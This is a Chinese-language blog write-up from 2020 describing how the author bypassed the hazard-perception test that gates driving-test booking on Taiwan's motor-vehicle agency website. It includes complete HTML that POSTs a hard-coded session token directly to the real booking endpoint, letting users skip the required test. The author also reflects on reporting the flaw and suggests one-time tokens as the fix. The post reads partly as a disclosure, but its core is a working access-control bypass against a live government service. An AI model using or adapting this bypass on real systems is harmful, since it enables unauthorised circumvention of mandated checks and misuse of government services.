繞過考駕照預約報名的危險感知測驗

【研究目的】

同學要考駕照，完成測驗卻還是無法報名

【解決方法】

將網頁代碼及腳本複製下來，跳轉到預約報名頁面，使用Post方式跳轉

【心得】

最開始分析時有觀察到網頁的網址不同，不能預約的網頁後綴為"../locations#"，

能預約的網頁為"../locations/check"，首先從網址下手，將網址直接修改成能預約的網址，

碰壁了，沒辦法成功，會自動跳轉回填寫場次的介面，往下一個洞口移動，

當完成測驗後會出現"繼續預約報名"的按紐，利用查看網頁元素及源代碼，

製作一份自己的跳轉網頁，跳轉到有預約報名按鈕的網頁，花了點時間製作了一下，

成功了，不會自動跳回填寫場次的介面，可以直接預約報名了。

我不懂網頁html、css、js，所以就從之前寫的網頁做修改，可能寫法不是很專業，請見諒==

額 可能不算漏洞，官方只是改了一下Token，完全不想處理，

想要防止這種漏洞就是使用一次性Token，Token使用過後卻還可以一直繞過，

關於回報漏洞，這次我學到了，有些時候並不像想像的一樣美好。

【效果影片】

不能預約的網頁介面

可預約的網頁介面

html code

<!DOCTYPE html>

<html lang="ch">

<head>

    <meta charset="UTF-8">

    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <meta http-equiv="X-UA-Compatible" content="ie=edge">

    <title>考駕照預約報名</title>

    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/materialize/1.0.0/css/materialize.min.css">

    <link rel="stylesheet" href="./style.css">

</head>

<body>

<main>

    <button id="removeBtn" onclick="submitEmv()" style="width:450px;height:50px;font-size:25px;" class="btn waves-effect red darken-1">預約報名考駕照</button>

    <form id="emvTokenReturn" style="display:none" action="https://www.mvdis.gov.tw/m3-emv-trn/exm/locations/check" method="POST" target="_blank">

    <input id="emvToken" name="token" value="rUCJBzvos8099RZN456J82V1JRJBtFg0mpiTn2e_p_Vy9MXoUw4VJ-xl-Lm4_Vc2"></form>

</main>

<script>

    function submitEmv(){

    document.getElementById("emvTokenReturn").submit();

}

</script>

</body>

</html>

By:Hubert

Date September 27,2020